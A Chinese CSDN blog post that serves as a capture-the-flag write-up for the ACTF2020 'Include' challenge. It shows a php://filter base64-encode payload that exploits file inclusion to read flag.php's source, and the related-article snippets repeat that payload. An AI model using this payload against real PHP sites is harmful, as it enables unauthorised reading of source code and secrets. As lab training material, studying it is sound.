[ACTF2020 新生赛]Include

最新推荐文章于 2023-11-02 16:44:35 发布
最新推荐文章于 2023-11-02 16:44:35 发布
阅读量134 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51426816/article/details/113098413
版权

点击tips
在这里插入图片描述
URL中有flag.php.

php://filter伪协议
读取源代码内容进行base64编码后输出

php://filter/resource=<要过滤的数据流>
php://filter/read=<读链的筛选列表>
php://filter/write=<写链的筛选列表>

?file=php://filter/read=convert.base64-encode/resource=flag.php

显示出源文件flag.php经过base64编码后的内容
在这里插入图片描述
base64解码得到flag

祁行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
NTFS文件系统分析
09-19
### NTFS文件系统分析 #### 1. 引言 NTFS(New Technology File System)是微软公司开发的一种先进的文件系统,旨在提供更好的容错性和安全性。随着Windows操作系统的不断演进,NTFS已经成为Windows NT系列操作...
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
(PPJEmailPicker *) createAutoCompleteFieldWithFrame:( CGRect )frame{PPJEmailPicker * actf = [[PPJEmailPicker alloc ] initWithFrame: frame];actf. pickerDelegate = self;actf. possibleStrings = [...
fanuc函数翻译对比.doc
06-07
FANUC函数提供了多种控制轴和主轴相关的函数,例如`cnc_actf`函数用于读取实际轴进给速度,而`cnc_absolute`函数用于读取轴绝对位置。这些函数可以帮助开发者更好地控制和操作机床的控制轴和主轴。 机床状态函数 ...
focas2接口中文文档
07-28
1. `cnc_actf`:读取实际轴进给率(F),返回实际轴进给率的值。 2. `cnc_absolute`:读取绝对轴位置,返回绝对轴位置的值。 3. `cnc_absolute2`:读取绝对轴位置 2,返回绝对轴位置 2 的值。 4. `cnc_machine`:...
eclips3.7 汉化包
10-05
BabelLanguagePack-technology.actf-zh_3.7.0.v20110723043401.zip (4.46%) BabelLanguagePack-technology.bpel-zh_3.7.0.v20110723043401.zip (21.06%) BabelLanguagePack-technology.egit-zh_3.7.0.v...
FANUC_focas函数库(全)(中文版).pdf
09-16
cnc_actf - 读取实际轴进给率(F) **简要描述:** 此函数用于读取当前受控轴的实际进给率(F)值,这对于实时监控和调整加工过程非常有用。 - **适用版本:** 30i-B、0i-D、PM-i - **返回值:** 实际轴进给率值。 ...
ACTF2020新生]Include
最新发布
qq_59607911的博客
11-02 247
当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。这里需要注意的是使用php://filter伪协议进行文件包含时,需要加上。进入题目根据Tip进入正题,点击tip,发现有文件包含。发现题目对这个伪协议进行了过滤,那我们就使用。构造一个payload。对其解码,获取flag。来对文件内容进行编码。
BUUCTF | ACTF2020新生 include
weixin_47982238的博客
08-29 269
http://ee2ad130-7749-4957-b7b2-838f88b2bdd7.node3.buuoj.cn/ 其实看题目include我就先猜测也许是文件包含??? 点击tips,然后看到url栏如下图 看到?file=flag.php十有八九就是文件包含啦, 于是构造payload读取文件源码: ?file=php://filter/read=convert.base64-encode/resource=flag.php 看到一串base64编码,拿去解码成功拿到
BUUCTF:[ACTF2020 新生]Include
末初的CSDN博客
10-06 813
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 文件包含直接伪协议读取flag.php ?file=php://filter/convert.base64-encode/resource=flag.php PS C:\Users\Administrator> php -r "var_dump(base64_decode('PD9waHAKZWNobyAiQ2FuIHlvdSBma.
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值